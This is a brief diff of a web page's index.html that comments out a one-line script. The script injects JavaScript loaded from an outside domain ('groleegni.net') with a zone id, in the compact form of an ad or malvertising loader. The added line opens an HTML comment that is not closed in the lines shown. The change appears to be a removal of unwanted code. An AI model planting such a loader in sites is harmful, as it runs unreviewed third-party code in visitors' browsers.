--- a/index.html
+++ b/index.html
@@ -186,7 +186,7 @@
             </section>
         </div>
 
-		  <script>(function(d,z,s){s.src='https://'+d+'/401/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('groleegni.net',8867459,document.createElement('script'))</script>
+		<!--  <script>(function(d,z,s){s.src='https://'+d+'/401/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('groleegni.net',8867459,document.createElement('script'))</script>
     </main>
      <footer>
     <div class="footer-container">
